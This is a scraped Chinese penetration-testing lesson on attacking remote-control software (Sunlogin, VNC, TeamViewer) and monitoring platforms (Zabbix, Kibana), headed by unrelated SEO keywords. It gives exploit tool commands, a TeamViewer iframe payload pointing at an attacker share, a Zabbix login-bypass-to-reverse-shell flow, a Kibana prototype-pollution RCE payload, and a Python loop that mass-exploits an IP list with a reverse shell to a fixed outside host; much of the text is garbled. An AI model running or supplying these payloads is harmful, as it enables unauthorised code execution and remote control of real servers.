许昌住房城乡建设局网站,php在线做网站,wordpress 使用 中文路径,凡科网络第58天 服务攻防-应用协议设备KibanaZabbix远控向日葵VNCTV
知识点#xff1a;
1、远程控制第三方应用安全 2、三方应用-向日葵VNCTV 3、设备平台-ZabbixKibanai漏洞
章节内容#xff1a;
常见版务应用的安全测试#xff1a; 1…第58天 服务攻防-应用协议设备KibanaZabbix远控向日葵VNCTV
知识点
1、远程控制第三方应用安全 2、三方应用-向日葵VNCTV 3、设备平台-ZabbixKibanai漏洞
章节内容
常见版务应用的安全测试 1、配置不当-未授权访问 2、安全机制特定安全漏洞 3、安全机制-弱口令侵破攻击
前置知识
应用服务安全测试流程见图 1、判断服务开放情况-端口扫描组合应用等 2、判断服务类型归属数据库文件传输通讯等 3、判断服务利用方式特定漏洞8未授权弱口令等
演示案例
远程控制-向日葵VncTeamviewer 设备平台-Zabbix-CVE-2022-23131 设备平台-Kibana-CVE-2019-7609
远程控制-向日葵VncTeamviewer
-向日葵RCE https://github.com/Mr-xn/sunlogin_rce xrkRce.exe -h 192.168.46.157 -t scan xrkRce.exe -h 192.168.46.157-t rce-p 49712-c “ipconfig”
-VNC口令问题未授权 MSF内置口令及未授权测试
-Teamviewer 需要满足亮点两点1、主机安装Teamviewer 2、管理员点击访问构造好的链接 IDOCTYPE html
html
head
stitlecv2020-13699/itle
/head
body
pWelcome to xiaodil/p
iframe styleheight:1px;width:1px;srcteamviewer10:--play Wattacker-
IP\sharelfake.tvs/iframe
/body
/html设备平台-Zabbix-CVE-2022-23131
Zabbiⅸ是由Alexei Vladishev开发的一种网络监视、管理系统基于Server-Client架构。 是一款服务器监控软件其由server、.agent、,web等模块组成其中web模块由PHP编 写用来显示数据库中的结果。默认端口10051红 Zabbix CVE-2022-23131登录绕过漏洞复现 https://github.com/LOading-x/cve-2022-23131 python3 zabbix.py target Admin 然后修改Cookie,使用saml登录即可 CVE-2017-2824CVE-2020-11800 获取权限后续利用1、添加反弹shell脚本–2、服务器执行脚本–3、获取服务器权限 添加反弹shell脚本 找到服务器配置处 运行脚本
设备平台-Kibana-CVE-2019-7609
Kibanai为Elassticsearch设计的一款开源的视图工具。其5.6.15和6.6.1之前的版本中存在一 处原型链污染泥洞利用泥洞可以在目标服务器上执行任意代码。默认端口5601 https://github.com/LandGrey/CVE-2019-7609 es(*).props(label._proto_env.AAAA‘require(“child_process”).exec(“/bin/touch /tmp/success”):process.exit//).props(label._proto.env.NODE_OPTIONS’–require /proc/self/environ’) 脚本批量探测
import osfor ip in open(ips.txt);ipip.strip() #换行符cmdlineD:\python2.7\python.exe CVE-2019-7605-kibana-rce.py -u %s -host 41.94.236.117 -port 5566 --shell %ipos.system(cmdline)
